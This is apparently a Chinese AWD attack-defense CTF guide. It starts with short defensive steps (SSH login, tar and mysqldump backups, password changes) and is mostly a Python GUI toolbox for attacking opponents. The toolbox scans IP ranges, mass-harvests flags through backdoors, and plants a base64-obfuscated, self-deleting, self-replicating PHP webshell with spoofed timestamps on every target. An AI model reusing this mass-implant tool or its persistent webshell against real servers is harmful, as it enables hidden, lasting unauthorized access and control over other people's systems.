登录
利用命令登录
ssh 用户名@ip
ssh ctf@192.168.182.130
或者指定其他端口
ssh -p 指定端口号 用户名@ip
ssh -p 2222 ctf@192.168.182.130
利用图形化工具Xshell或者Finalshell
利用密钥登入用id_rsa用于登陆靶机,命令如下
sftp -i id_rsa ctf@192.168.182.130
备份源码
比赛开始后第一时间备份服务器中web目录下的文件(/var/www/html),备份的目的在于万一对方利用漏洞进入你的靶机将你的WWW下的目录给删除了,可以及时恢复,如果你没有备份就相当于宕机了
1.目录打包
pwn:
cd /home && tar -zcvf /tmp/pwn.tar.gz /home
python:
cd / && tar -czvf/tmp/app.tar.gz app
php :
cd /var/www && tar -czvf /tmp/html.tar.gz html
备份整站
cd /var/www && tar -czvf /tmp/html.tar.gz html
# python
cd / && tar -czvf /tmp/app.tgz app
解包
tar -zxvf html.tar.gz /var/www
2.备份数据库
备份mysql数据库
mysqldump -u 用户名 -p 密码 数据库名 > back.sql //备份指定数据库
mysqldump --all-databases > back.sql //备份所有数据库
还原mysql数据库
mysql -u 用户名 -p 密码 数据库名 < back.sql
查漏
将备份的源码丢到D盾或者昆吾探测漏洞
修改密码
SSH
passwd
MYSQL
#方法一
show databases;
use mysql
set password for 用户名@localhost = password(新密码);
#方法二
mysqladmin -u用户名 -p旧密码 password 新密码
#方法三
update user set password = PASSWORD(新密码) where user='用户名';
flush privileges;
show tables;
扫描存活主机+端口
import tkinter as tk
import asyncio
import aiohttp
import ipaddress
import threading
import requests
import tkinter.ttk
import time
import re
# Start loop queue
def start_thread_loop(new_loop):
asyncio.set_event_loop(new_loop)
new_loop.run_forever()
loop = asyncio.new_event_loop()
threading.Thread(target=start_thread_loop, args=(loop,), daemon=True).start()
async def acheck_tcp(ip, port):
pwn = pwn_entry.get()
file = file1_entry.get()
try:
reader, writer = await asyncio.open_connection(ip, port)
data = b""
for _ in range(5):
data += await reader.read(1024)
if pwn in data.decode():
output_text.insert(tk.END, ip + ":" + port + "\n")
with open(file, "a") as file:
file.write(ip + ":" + port + "\n")
break
writer.close()
await writer.wait_closed()
except Exception as e:
pass
async def acheck_http(url):
web = web_entry.get()
file = file_entry.get()
try:
async with aiohttp.ClientSession() as session:
async with session.get(url, timeout=5) as response:
text = await response.text()
if web in text:
output_text.insert(tk.END, url[7:] + "\n")
with open(file, "a") as file:
file.write(url[7:] + "\n")
except Exception as e:
pass
async def check_pwn():
output_text.insert(tk.END, "pwn---------------------------------------------------------------pwn" + "\n")
ip_range = ip1_entry.get()
port = port1_entry.get()
ips = ip_range_to_list(ip_range)
tasks = []
for ip in ips:
tasks.append(asyncio.create_task(acheck_tcp(ip, port)))
for task in tasks:
await task
async def check_web():
output_text.insert(tk.END, "web---------------------------------------------------------------web" + "\n")
ip_range = ip_entry.get()
port = port_entry.get()
ip_list = ip_range_to_list(ip_range)
tasks = []
for ip in ip_list:
url = "http://" + ip + ":" + port
tasks.append(asyncio.create_task(acheck_http(url)))
for task in tasks:
await task
async def submit(url0):
# Get values from GUI entries
shell_url = shell_entry.get()
password = password_entry.get()
url = "http://" + url0 + "/" + shell_url # 后门的路径
# ?pwd=Z@pGPk9@fDbKWlSi
shell = '''system("echo 'PD9waHAKaWdub3JlX3VzZXJfYWJvcnQodHJ1ZSk7CnNldF90aW1lX2xpbWl0KDApOwp1bmxpbmsoX19GSUxFX18pOwokZmlsZSA9ICctY29uZmlnLnBocCc7CiRjb2RlID0gJzw/cGhwIGlmKG1kNSgkX0dFVFsicHdkIl0pPT0iNDM0MzE4MjdlMDQxMGQxYThhZTllZmUxMjJiNzM1MzgiKXtAZXZhbCgkX1BPU1RbYV0pO30gPz4nOwp3aGlsZSAoMSl7CiAgICBmaWxlX3B1dF9jb250ZW50cygkZmlsZSwkY29kZSk7CiAgICBzeXN0ZW0oJ3RvdWNoIC1tIC1kICIyMDIxLTA4LTIzIDEzOjQ2OjEyIiAuY29uZmlnLnBocCcpOwogICAgc3lzdGVtKCJlY2hvICdkSEpoZG1WeVpHbHlLQ2tvY0hWemFHUWdJaVF4SWlBK0lDOWtaWFl2Ym5Wc2JDQXlQaVl4TzJadmNpQm1hV3hsSUdsdUlHQnNjeUF0TVdBN1pHOGdhV1lnZEdWemRDQXRaQ0FpSkdacGJHVWlPM1JvWlc0Z1kzQWdKRkJYUkM4dFkyOXVabWxuTG5Cb2NDQWtVRmRFTHlSbWFXeGxPMlZqYUc4Z0lpUlFWMFF2SkdacGJHVWlPM1J5WVhabGNtUnBjaUFpSkdacGJHVWlJQ0lrS0NoMFlXSWdLeUF4SUNBcEtTSTdabWs3Wkc5dVpTazdkSEpoZG1WeVpHbHknIHwgYmFzZTY0IC1kID4gMS5zaCIpOwogICAgJGFzZCA9IHN5c3RlbSgiYmFzaCAxLnNoIik7CiAgICB1c2xlZXAoMSk7Cn0=' | base64 -d > /var/www/html/asd.php");'''
data = password + "=" + shell # 后门的密码
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
response = requests.post(url, data=data, headers=header, verify=False, timeout=1)
url2 = "http://" + url0 + "/asd.php"
try:
res = requests.get(url2, timeout=1)
except:
pass
url3 = "http://" + url0 + "/-config.php?pwd=Z@pGPk9@fDbKWlSi"
res3 = requests.get(url3, timeout=10)
if "200" in str(res3):
output_text.insert(tk.END, url0 + "\n")
output_text.insert(tk.END, "蠕虫不死马植入成功" + "\n")
async def submit_1():
now = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
output_text.insert(tk.END, now + "\n")
file = file2_entry.get()
tasks = []
if file != "":
txt = file
f = open(txt, 'r+')
for i in f.readlines():
url = i.strip()
asyncio.run_coroutine_threadsafe(submit(url), loop)
async def submit_2(url):
# Get values from GUI entries
shell_url = shell1_entry.get()
password = password1_entry.get()
url = "http://" + url + "/" + shell_url # 后门的地址
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
data = password # 获取flag的命令
try:
async with aiohttp.ClientSession() as session:
async with session.post(url=url, data=data, headers=header, timeout=3) as response:
response_text = await response.text()
matchObj = re.search('(flag{.*})', response_text)
gg = matchObj.group(1)
output_text.insert(tk.END, gg + "\n")
except Exception as e:
pass
def submit_3():
now = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
output_text.insert(tk.END, now + "\n")
file = file3_entry.get()
tasks = []
if file != "":
txt = file
f = open(txt, 'r+')
for i in f.readlines():
url = i.strip()
asyncio.run_coroutine_threadsafe(submit_2(url), loop)
def ip_range_to_list(ip_range):
start_ip, end_ip = ip_range.split('-')
start_ip = ipaddress.IPv4Address(start_ip.strip())
end_ip = ipaddress.IPv4Address(end_ip.strip())
ip_list = []
for ip_address in range(int(start_ip), int(end_ip) + 1):
ip_list.append(str(ipaddress.IPv4Address(ip_address)))
return ip_list
def generate_ips():
url11111 = url_entry.get()
start = start_entry.get()
end = end_entry.get()
with open("ip.txt", "a") as file:
for i in range(int(start), int(end) + 1):
url = url11111 + "." + str(i)
file.write(url + "\n")
status_label.config(text="Status: IP地址已写入到ip.txt")
# Set up GUI window
root = tk.Tk()
root.geometry("600x650")
root.title("awd工具箱v1.0")
notebook = tk.ttk.Notebook(root)
frameOne = tkinter.Frame()
frameTwo = tkinter.Frame()
frameThree = tkinter.Frame()
frameFour = tkinter.Frame()
frameFive = tkinter.Frame()
text_container = tk.Frame(root)
text_container.pack(side="top")
text_scrollbar = tk.Scrollbar(text_container)
text_scrollbar.pack(side="right", fill="y")
output_text = tk.Text(text_container, yscrollcommand=text_scrollbar.set)
output_text.pack()
text_scrollbar.config(command=output_text.yview)
# Define GUI widgets
ip_label = tk.Label(frameOne, text="请输入ip段:")
ip_entry = tk.Entry(frameOne)
port_label = tk.Label(frameOne, text="请输入端口:")
port_entry = tk.Entry(frameOne)
web_label = tk.Label(frameOne, text="请输入网站特征:")
web_entry = tk.Entry(frameOne)
file_label = tk.Label(frameOne, text="请输入生成的文件名:")
file_entry = tk.Entry(frameOne)
genips_button = tk.Button(frameOne, text="扫描web")
ip1_label = tk.Label(frameTwo, text="请输入ip段:")
ip1_entry = tk.Entry(frameTwo)
port1_label = tk.Label(frameTwo, text="请输入端口:")
port1_entry = tk.Entry(frameTwo)
pwn_label = tk.Label(frameTwo, text="请输入pwn特征:")
pwn_entry = tk.Entry(frameTwo)
file1_label = tk.Label(frameTwo, text="请输入生成的文件名:")
file1_entry = tk.Entry(frameTwo)
genips1_button = tk.Button(frameTwo, text="扫描pwn")
file2_label = tk.Label(frameThree, text="请输入ip文件名:")
file2_entry = tk.Entry(frameThree)
shell_label = tk.Label(frameThree, text="请输入shell地址:")
shell_entry = tk.Entry(frameThree)
password_label = tk.Label(frameThree, text="请输入密码:")
password_entry = tk.Entry(frameThree)
submit_button = tk.Button(frameThree, text="Submit")
file3_label = tk.Label(frameFour, text="请输入ip文件名:")
file3_entry = tk.Entry(frameFour)
shell1_label = tk.Label(frameFour, text="请输入shell地址:")
shell1_entry = tk.Entry(frameFour)
password1_label = tk.Label(frameFour, text="请输入post内容:")
password1_entry = tk.Entry(frameFour)
submit1_button = tk.Button(frameFour, text="Submit", command=submit_3)
url_label = tk.Label(frameFive, text="请输入ip(example:192.168.191):")
url_entry = tk.Entry(frameFive)
start_label = tk.Label(frameFive, text="开始:")
start_entry = tk.Entry(frameFive)
end_label = tk.Label(frameFive, text="结束:")
end_entry = tk.Entry(frameFive)
status_label = tk.Label(frameFive, text="Status: ")
genips1111111_button = tk.Button(frameFive, text="Generate IPs", command=generate_ips)
ip_label.pack(side="top", anchor="center", padx=30)
ip_entry.pack(side="top", anchor="center", padx=30)
port_label.pack(side="top", anchor="center", padx=30)
port_entry.pack(side="top", anchor="center", padx=30)
web_label.pack(side="top", anchor="center", padx=30)
web_entry.pack(side="top", anchor="center", padx=30)
file_label.pack(side="top", anchor="center", padx=30)
file_entry.pack(side="top", anchor="center", padx=30)
genips_button.pack(side="top", anchor="center", padx=25, pady=5)
genips_button.config(command=lambda: asyncio.run_coroutine_threadsafe(check_web(), loop))
ip1_label.pack(side="top", anchor="center", padx=30)
ip1_entry.pack(side="top", anchor="center", padx=30)
port1_label.pack(side="top", anchor="center", padx=30)
port1_entry.pack(side="top", anchor="center", padx=30)
pwn_label.pack(side="top", anchor="center", padx=30)
pwn_entry.pack(side="top", anchor="center", padx=30)
file1_label.pack(side="top", anchor="center", padx=30)
file1_entry.pack(side="top", anchor="center", padx=30)
genips1_button.pack(side="top", anchor="center", padx=25, pady=5)
genips1_button.config(command=lambda: asyncio.run_coroutine_threadsafe(check_pwn(), loop))
file2_label.pack(side="top", anchor="center", padx=40)
file2_entry.pack(side="top", anchor="center", padx=40)
shell_label.pack(side="top", anchor="center", padx=40)
shell_entry.pack(side="top", anchor="center", padx=40)
password_label.pack(side="top", anchor="center", padx=40)
password_entry.pack(side="top", anchor="center", padx=40)
submit_button.pack(side="top", padx=5, pady=23)
submit_button.config(command=lambda: asyncio.run(submit_1()))
file3_label.pack(side="top", anchor="center", padx=40)
file3_entry.pack(side="top", anchor="center", padx=40)
shell1_label.pack(side="top", anchor="center", padx=40)
shell1_entry.pack(side="top", anchor="center", padx=40)
password1_label.pack(side="top", anchor="center", padx=40)
password1_entry.pack(side="top", anchor="center", padx=40)
submit1_button.pack(side="top", padx=5, pady=23)
url_label.pack(side="top", anchor="center", padx=30)
url_entry.pack(side="top", anchor="center", padx=30)
start_label.pack(side="top", anchor="center", padx=30)
start_entry.pack(side="top", anchor="center", padx=30)
end_label.pack(side="top", anchor="center", padx=30)
end_entry.pack(side="top", anchor="center", padx=30)
status_label.pack(side="top", anchor="center", padx=30)
genips1111111_button.pack(side="top", padx=5, pady=23)
notebook.add(frameOne, text='web扫描')
notebook.add(frameTwo, text='pwn扫描')
notebook.add(frameFive, text='ip生成')
notebook.add(frameThree, text='一键植入蠕虫马')
notebook.add(frameFour, text='获取flag')
notebook.pack(padx=10, pady=5, fill=tkinter.BOTH)
root.mainloop()